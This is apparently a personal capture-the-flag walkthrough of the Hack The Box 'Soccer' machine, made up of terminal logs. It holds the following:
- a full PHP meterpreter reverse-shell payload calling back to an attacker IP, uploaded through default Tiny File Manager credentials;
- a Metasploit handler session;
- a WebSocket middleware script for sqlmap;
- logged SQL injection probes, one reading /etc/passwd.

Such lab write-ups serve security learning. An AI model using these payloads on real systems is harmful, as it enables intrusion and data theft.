https://app.hackthebox.com/machines/Soccer

https://app.hackthebox.com/machines/Soccer

https://app.hackthebox.com/machines/Soccer_第1张图片

https://app.hackthebox.com/machines/Soccer_第2张图片

┌──(kwkl㉿kwkl)-[~]
└─$ cat /etc/hosts                                                                                                                                                          1127.0.0.1       localhost
127.0.1.1       kwkl.kwkl       kwkl

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters


10.129.187.153 unika.htb
10.129.187.172 thetoppers.htb
10.129.187.172 s3.thetoppers.htb
#10.129.235.232 megacorp.com
#
#


10.10.11.196 stocker.htb

10.10.11.196 dev.stocker.htb

10.10.11.194 soccer.htb


┌──(kwkl㉿kwkl)-[~/桌面/burp]
└─$ nmap -A 10.10.11.194 -T4                                                                                                                                              130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:46 HKT
Nmap scan report for 10.10.11.194 (10.10.11.194)
Host is up (0.99s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   informix: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=3/3%Time=640208C3%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.63 seconds
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/桌面/burp]



https://app.hackthebox.com/machines/Soccer_第3张图片

https://app.hackthebox.com/machines/Soccer_第4张图片

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ gobuster dir -u soccer.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt                                                                               1===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2023/03/04 11:51:23 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 9478 / 87665 (10.81%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/03/04 12:04:41 Finished
===============================================================

https://app.hackthebox.com/machines/Soccer_第5张图片

search exploit

https://app.hackthebox.com/machines/Soccer_第6张图片

https://app.hackthebox.com/machines/Soccer_第7张图片

How to use

Download ZIP with latest version from master branch.

Just copy the tinyfilemanager.php to your webspace - thats all You can also change the file name from “tinyfilemanager.php” to something else, you know what i meant for.

Default username/password: admin/admin@123 and user/12345.

⚠️ Warning: Please set your own username and password in $auth_users before use. password is encrypted with password_hash(). to generate new password hash here

To enable/disable authentication set $use_auth to true or false.

ℹ️ Add your own configuration file config.php in the same folder to use as additional configuration file.

ℹ️ To work offline without CDN resources, use offline branch


Try username password

Try user/12345.

https://app.hackthebox.com/machines/Soccer_第8张图片

Try admin/admin@123

https://app.hackthebox.com/machines/Soccer_第9张图片

Tiny File Manager 2.4.3

have upload file privilege

https://app.hackthebox.com/machines/Soccer_第10张图片

search exploit:

https://app.hackthebox.com/machines/Soccer_第11张图片

https://app.hackthebox.com/machines/Soccer_第12张图片

generous the horse

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ cat ~/shell.php                                                                                                                                                         1 ⨯
/*<?php /**/ error_reporting(0); $ip = '10.10.16.9'; $port = 5555; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=5555 -o shell.php

https://app.hackthebox.com/machines/Soccer_第13张图片

https://app.hackthebox.com/machines/Soccer_第14张图片

──(kwkl㉿kwkl)-[~]
└─$ msfconsole                                                                        
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----                                                                                                                            
                            /  ,' `-._<.===-'                                                                                                                                   
                           /  /                                                                                                                                                 
                          /  ;                                                                                                                                                  
              _          /   ;                                                                                                                                                  
 (`._    _.-"" ""--..__,'    |                                                                                                                                                  
 <_  `-""                     \                                                                                                                                                 
  <`-                          :                                                                                                                                                
   (__   <__.                  ;                                                                                                                                                
     `-.   '-.__.      _.'    /                                                                                                                                                 
        \      `-.__,-'    _,'                                                                                                                                                  
         `._    ,    /__,-'                                                                                                                                                     
            ""._\__,'< <____                                                                                                                                                    
                 | |  `----.`.                                                                                                                                                  
                 | |        \ `.                                                                                                                                                
                 ; |___      \-``                                                                                                                                               
                 \   --<                                                                                                                                                        
                  `.`.<                                                                                                                                                         
                    `-'                                                                                                                                                         
                                                                                                                                                                                
                                                                                                                                                                                

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2265 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View advanced module options with 
advanced
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search handler

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/windows/ftp/aasync_list_reply                          2010-10-12       good       No     AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
   1   exploit/linux/local/abrt_raceabrt_priv_esc                     2015-04-14       excellent  Yes    ABRT raceabrt Privilege Escalation
   2   exploit/linux/local/abrt_sosreport_priv_esc                    2015-11-23       excellent  Yes    ABRT sosreport Privilege Escalation
   3   exploit/windows/misc/cve_2022_28381_allmediaserver_bof         2022-04-01       good       No     ALLMediaServer 1.6 SEH Buffer Overflow
   4   exploit/windows/browser/aim_goaway                             2004-08-09       great      No     AOL Instant Messenger goaway Overflow
   5   exploit/linux/local/apt_package_manager_persistence            1999-03-09       excellent  No     APT Package Manager Persistence
   6   exploit/linux/http/accellion_fta_getstatus_oauth               2015-07-10       excellent  Yes    Accellion FTA getStatus verify_oauth_token Command Execution
   7   exploit/windows/misc/achat_bof                                 2014-12-18       normal     No     Achat Unicode SEH Buffer Overflow
   8   exploit/android/local/janus                                    2017-07-31       manual     Yes    Android Janus APK Signature bypass
   9   auxiliary/scanner/http/apache_activemq_traversal                                normal     No     Apache ActiveMQ Directory Traversal
   10  auxiliary/scanner/http/apache_activemq_source_disclosure                        normal     No     Apache ActiveMQ JSP Files Source Disclosure
   11  auxiliary/scanner/http/apache_mod_cgi_bash_env                 2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   12  exploit/linux/local/apport_abrt_chroot_priv_esc                2015-03-31       excellent  Yes    Apport / ABRT chroot Privilege Escalation
   13  exploit/windows/local/ps_wmi_exec                              2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   14  exploit/windows/http/bea_weblogic_transfer_encoding            2008-09-09       great      No     BEA Weblogic Transfer-Encoding Buffer Overflow
   15  exploit/linux/local/bash_profile_persistence                   1989-06-08       normal     No     Bash Profile Persistence
   16  exploit/freebsd/misc/citrix_netscaler_soap_bof                 2014-09-22       normal     Yes    Citrix NetScaler SOAP Handler Remote Code Execution
   17  exploit/windows/misc/stream_down_bof                           2011-12-27       good       No     CoCSoft StreamDown 6.8.0 Buffer Overflow
   18  exploit/windows/fileformat/cyberlink_lpp_bof                   2017-09-23       normal     No     CyberLink LabelPrint 2.5 Stack Buffer Overflow
   19  exploit/windows/fileformat/cyberlink_p2g_bof                   2011-09-12       great      No     CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit
   20  exploit/linux/http/dlink_hnap_bof                              2014-05-15       normal     Yes    D-Link HNAP Request Remote Buffer Overflow
   21  exploit/linux/http/dlink_dspw215_info_cgi_bof                  2014-05-22       normal     Yes    D-Link info.cgi POST Request Buffer Overflow
   22  exploit/linux/local/desktop_privilege_escalation               2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   23  exploit/windows/browser/exodus                                 2018-01-25       manual     No     Exodus Wallet (ElectronJS Framework) remote Code Execution
   24  exploit/windows/ftp/ftpsynch_list_reply                        2010-10-12       good       No     FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow
   25  exploit/windows/ftp/ftpgetter_pwd_reply                        2010-10-12       good       No     FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
   26  exploit/windows/ftp/ftpshell51_pwd_reply                       2010-10-12       good       No     FTPShell 5.1 Stack Buffer Overflow
   27  exploit/windows/fileformat/foxit_title_bof                     2010-11-13       great      No     Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
   28  exploit/freebsd/telnet/telnet_encrypt_keyid                    2011-12-23       great      No     FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   29  exploit/windows/ftp/gekkomgr_list_reply                        2010-10-12       good       No     Gekko Manager FTP Client Stack Buffer Overflow
   30  exploit/multi/handler                                                           manual     No     Generic Payload Handler
   31  exploit/windows/misc/hp_dataprotector_new_folder               2012-03-12       normal     No     HP Data Protector Create New Folder Buffer Overflow
   32  exploit/multi/http/hp_sitescope_uploadfileshandler             2012-08-29       good       No     HP SiteScope Remote Code Execution
   33  exploit/windows/browser/notes_handler_cmdinject                2012-06-18       excellent  No     IBM Lotus Notes Client URL Handler Command Injection
   34  auxiliary/dos/misc/ibm_tsm_dos                                 2015-12-15       normal     No     IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
   35  exploit/windows/firewall/blackice_pam_icq                      2004-03-18       great      No     ISS PAM.dll ICQ Parser Buffer Overflow
   36  exploit/linux/telnet/telnet_encrypt_keyid                      2011-12-23       great      No     Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   37  exploit/windows/iis/ms01_033_idq                               2001-06-18       good       No     MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
   38  exploit/windows/browser/ms05_054_onload                        2005-11-21       normal     No     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   39  exploit/windows/browser/ms13_055_canchor                       2013-07-09       normal     No     MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
   40  exploit/windows/browser/ms13_059_cflatmarkuppointer            2013-06-27       normal     No     MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
   41  exploit/windows/browser/ms13_069_caret                         2013-09-10       normal     No     MS13-069 Microsoft Internet Explorer CCaret Use-After-Free
   42  exploit/windows/browser/ms13_080_cdisplaypointer               2013-10-08       normal     No     MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
   43  exploit/windows/browser/ie_setmousecapture_uaf                 2013-09-17       normal     No     MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free
   44  exploit/windows/fileformat/ms14_060_sandworm                   2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   45  exploit/windows/fileformat/magix_musikmaker_16_mmm             2011-04-26       good       No     Magix Musik Maker 16 .mmm Stack Buffer Overflow
   46  auxiliary/gather/eventlog_cred_disclosure                      2014-11-05       normal     No     ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure
   47  exploit/multi/http/maracms_upload_exec                         2020-08-31       excellent  Yes    MaraCMS Arbitrary PHP File Upload
   48  exploit/unix/webapp/guestbook_ssi_exec                         1999-11-05       excellent  No     Matt Wright guestbook.pl Arbitrary Command Execution
   49  auxiliary/dos/http/metasploit_httphandler_dos                  2019-09-04       normal     No     Metasploit HTTP(S) handler DoS
   50  exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec          2010-06-09       excellent  No     Microsoft Help Center XSS and Command Execution
   51  exploit/windows/fileformat/office_word_hta                     2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution
   52  exploit/windows/mssql/mssql_linkcrawler                        2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   53  exploit/linux/http/netgear_readynas_exec                       2013-07-12       manual     Yes    NETGEAR ReadyNAS Perl Code Evaluation
   54  auxiliary/server/dns/native_server                                              normal     No     Native DNS Server (Example)
   55  exploit/windows/fileformat/nuance_pdf_launch_overflow          2010-10-08       great      No     Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
   56  exploit/windows/ftp/odin_list_reply                            2010-10-12       good       No     Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)
   57  exploit/windows/browser/persits_xupload_traversal              2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   58  exploit/windows/http/integard_password_bof                     2010-09-07       great      No     Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow
   59  exploit/linux/http/raidsonic_nas_ib5220_exec_noauth            2013-02-04       manual     No     Raidsonic NAS Devices Unauthenticated Remote Command Execution
   60  exploit/windows/local/razer_zwopenprocess                      2017-03-22       normal     Yes    Razer Synapse rzpnk.sys ZwOpenProcess
   61  exploit/linux/http/rconfig_ajaxarchivefiles_rce                2020-03-11       good       Yes    Rconfig 3.x Chained Remote Code Execution
   62  auxiliary/dos/http/webrick_regex                               2008-08-08       normal     No     Ruby WEBrick::HTTP::DefaultFileHandler DoS
   63  exploit/osx/browser/safari_user_assisted_download_launch       2014-03-10       manual     No     Safari User-Assisted Download and Run Attack
   64  exploit/android/browser/samsung_knox_smdm_url                  2014-11-12       excellent  No     Samsung Galaxy KNOX Android Browser RCE
   65  exploit/windows/ftp/scriptftp_list                             2011-10-12       good       No     ScriptFTP LIST Remote Buffer Overflow
   66  exploit/windows/ftp/seagull_list_reply                         2010-10-12       good       No     Seagull FTP v3.3 Build 409 Stack Buffer Overflow
   67  exploit/windows/http/sitecore_xp_cve_2021_42237                2021-11-02       excellent  Yes    Sitecore Experience Platform (XP) PreAuth Deserialization RCE
   68  auxiliary/dos/http/squid_range_dos                             2021-05-27       normal     No     Squid Proxy Range Header DoS
   69  auxiliary/server/teamviewer_uri_smb_redirect                                    normal     No     TeamViewer Unquoted URI Handler SMB Redirect
   70  exploit/linux/http/trendmicro_websecurity_exec                 2020-06-10       excellent  Yes    Trend Micro Web Security (Virtual Appliance) Remote Code Execution
   71  exploit/windows/misc/trendmicro_cmdprocessor_addtask           2011-12-07       good       No     TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow
   72  exploit/windows/http/ultraminihttp_bof                         2013-07-10       normal     No     Ultra Mini HTTPD Stack Buffer Overflow
   73  exploit/windows/local/bypassuac_comhijack                      1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   74  exploit/windows/local/bypassuac_sluihijack                     2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   75  exploit/multi/http/wp_ait_csv_rce                              2020-11-14       excellent  Yes    WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
   76  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   77  auxiliary/admin/http/wp_gdpr_compliance_privesc                2018-11-08       normal     Yes    WordPress WP GDPR Compliance Plugin Privilege Escalation
   78  exploit/windows/fileformat/xion_m3u_sehbof                     2010-11-23       great      No     Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow
   79  exploit/linux/local/yum_package_manager_persistence            2003-12-17       excellent  No     Yum Package Manager Persistence
   80  exploit/windows/fileformat/zahir_enterprise_plus_csv           2018-09-28       normal     No     Zahir Enterprise Plus 6 Stack Buffer Overflow
   81  exploit/linux/http/zyxel_ztp_rce                               2022-04-28       excellent  Yes    Zyxel Firewall ZTP Unauthenticated Command Injection
   82  exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   83  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc     2015-12-18       excellent  Yes    blueman set_dhcp_handler D-Bus Privilege Escalation


Interact with a module by name or index. For example info 83, use 83 or use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/
set payload php/bind_perl                       set payload php/exec                            set payload php/meterpreter/reverse_tcp
set payload php/bind_perl_ipv6                  set payload php/meterpreter/bind_tcp            set payload php/meterpreter/reverse_tcp_uuid
set payload php/bind_php                        set payload php/meterpreter/bind_tcp_ipv6       set payload php/meterpreter_reverse_tcp
set payload php/bind_php_ipv6                   set payload php/meterpreter/bind_tcp_ipv6_uuid  set payload php/reverse_perl
set payload php/download_exec                   set payload php/meterpreter/bind_tcp_uuid       set payload php/reverse_php
msf6 exploit(multi/handler) > set payload php/meterpreter/
set payload php/meterpreter/bind_tcp            set payload php/meterpreter/bind_tcp_ipv6_uuid  set payload php/meterpreter/reverse_tcp
set payload php/meterpreter/bind_tcp_ipv6       set payload php/meterpreter/bind_tcp_uuid       set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload php/meterpreter/
set payload php/meterpreter/bind_tcp            set payload php/meterpreter/bind_tcp_ipv6_uuid  set payload php/meterpreter/reverse_tcp
set payload php/meterpreter/bind_tcp_ipv6       set payload php/meterpreter/bind_tcp_uuid       set payload php/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.9
lhost => 10.10.16.9
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > ls
[*] exec: ls

 allowed.userlist          Cookies           google-chrome-stable_current_amd64.deb             logs                        raw-md5             TransportSecurity   公共
 allowed.userlist.passwd   Cookies-journal   GPUCache                                           machineid                   respondehash1.txt   User                圖片
 Backups                   Crashpad          hash.txt                                           module13                    respondehash.txt    vaccinhash.txt      影片
 blob_storage              ctf4              HAsIXULC.html                                      msf                        'Service Worker'     vpy3.9              文件
 Cache                     ctf8              HODL                                              'Network Persistent State'  'Session Storage'    vulhub              桌面
 CachedData                databases         JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar   paused.conf                 shell.php           WebStorage          模板
 CachedExtensions          Dictionaries      languagepacks.json                                 Preferences                 shell.sh            worknotes.txt       音樂
'Code Cache'               flag.txt         'Local Storage'                                     prod.dtsConfig              solve_pow.py        下载
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.16.9       yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.9:5555 
[*] Sending stage (39927 bytes) to 10.10.11.194
[*] Meterpreter session 1 opened (10.10.16.9:5555 -> 10.10.11.194:52842) at 2023-03-05 11:12:21 +0800

meterpreter > sysinfo
Computer    : soccer
OS          : Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter > id
[-] Unknown command: id
meterpreter > id
[-] Unknown command: id
meterpreter > os-shell
[-] Unknown command: os-shell
meterpreter > ?

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

meterpreter > shell
Process 1689 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
shell.php
ss -lntup
Netid   State    Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  Process                                                                         
udp     UNCONN   0        0          127.0.0.53%lo:53             0.0.0.0:*                                                                                     
udp     UNCONN   0        0                0.0.0.0:68             0.0.0.0:*                                                                                     
tcp     LISTEN   0        151            127.0.0.1:3306           0.0.0.0:*                                                                                     
tcp     LISTEN   0        511              0.0.0.0:80             0.0.0.0:*      users:(("nginx",pid=1127,fd=6),("nginx",pid=1126,fd=6))                        
tcp     LISTEN   0        4096       127.0.0.53%lo:53             0.0.0.0:*                                                                                     
tcp     LISTEN   0        128              0.0.0.0:22             0.0.0.0:*                                                                                     
tcp     LISTEN   0        511            127.0.0.1:3000           0.0.0.0:*                                                                                     
tcp     LISTEN   0        511              0.0.0.0:9091           0.0.0.0:*                                                                                     
tcp     LISTEN   0        70             127.0.0.1:33060          0.0.0.0:*                                                                                     
tcp     LISTEN   0        511                 [::]:80                [::]:*      users:(("nginx",pid=1127,fd=7),("nginx",pid=1126,fd=7))                        
tcp     LISTEN   0        128                 [::]:22                [::]:*                                                                                     
cat /etc/nginx.conf
cat: /etc/nginx.conf: No such file or directory
cat /etc/hosts
127.0.0.1       localhost       soccer  soccer.htb      soc-player.soccer.htb

127.0.1.1       ubuntu-focal    ubuntu-focal

find / -type d -name dstat 2>/dev/null
/usr/share/doc/dstat
/usr/share/dstat
/usr/local/share/dstat
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /usr/local/share/dstat 
/bin/sh: 10: cd: can't cd to /usr/local/share/dstat
ls
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
id
pwd

Terminate channel 0? [y/N]  n
pwd
pwd

Terminate channel 0? [y/N]  n

Terminate channel 0? [y/N]  n


find soc-player.soccer.htb

[sudo] kwkl 的密码:
                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ cat /etc/hosts                    
127.0.0.1       localhost
127.0.1.1       kwkl.kwkl       kwkl

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters


10.129.187.153 unika.htb
10.129.187.172 thetoppers.htb
10.129.187.172 s3.thetoppers.htb
#10.129.235.232 megacorp.com
#
#


10.10.11.196 stocker.htb

10.10.11.196 dev.stocker.htb

10.10.11.194 soccer.htb

10.10.11.194 soc-player.soccer.htb


try sqlmap

https://app.hackthebox.com/machines/Soccer_第15张图片

try sqlmap

sign up & login

https://app.hackthebox.com/machines/Soccer_第16张图片

https://app.hackthebox.com/machines/Soccer_第17张图片

https://app.hackthebox.com/machines/Soccer_第18张图片

try ws middle ware

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ cat ws.py        

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):
        ws = create_connection(ws_server)
        # If the server returns a response on connect, use below line
        #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

        # For our case, format the payload in JSON
        message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
        data = '{"id":"%s"}' % message

        ws.send(data)
        resp = ws.recv()
        ws.close()

        if resp:
                return resp
        else:
                return ''

def middleware_server(host_port,content_type="text/plain"):

        class CustomHandler(SimpleHTTPRequestHandler):
                def do_GET(self) -> None:
                        self.send_response(200)
                        try:
                                payload = urlparse(self.path).query.split('=',1)[1]
                        except IndexError:
                                payload = False

                        if payload:
                                content = send_ws(payload)
                        else:
                                content = 'No parameters specified!'

                        self.send_header("Content-type", content_type)
                        self.end_headers()
                        self.wfile.write(content.encode())
                        return

        class _TCPServer(TCPServer):
                allow_reuse_address = True

        httpd = _TCPServer(host_port, CustomHandler)
        httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
        middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
        pass


┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 ws.py
[+] Starting MiddleWare Server
[+] Send payloads in http://localhost:8081/?id=*
127.0.0.1 - - [05/Mar/2023 11:39:06] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:09] "GET /?id=1&ZLTO=7210%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:15] "GET /?id=1 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:26] "GET /?id=1%2C%27%28%29%2C%28.%22%29%2C HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:31] "GET /?id=1%27RWoWuw%3C%27%22%3EgHqXRX HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:35] "GET /?id=1%29%20AND%207838%3D9274%20AND%20%289743%3D9743 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:40] "GET /?id=1%20AND%207762%3D3250 HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:39:46] "GET /?id=1%20AND%204911%3D9784--%20GhqF HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:02] "GET /?id=1%27%29%20AND%204484%3D4965%20AND%20%28%27RbjR%27%3D%27RbjR HTTP/1.1" 200 -
127.0.0.1 - - [05/Mar/2023 11:40:06] "GET /?id=1%27%20AND%203834%3D5208%20AND%20%27VqnP%27%3D%27VqnP HTTP/1.1" 200 -
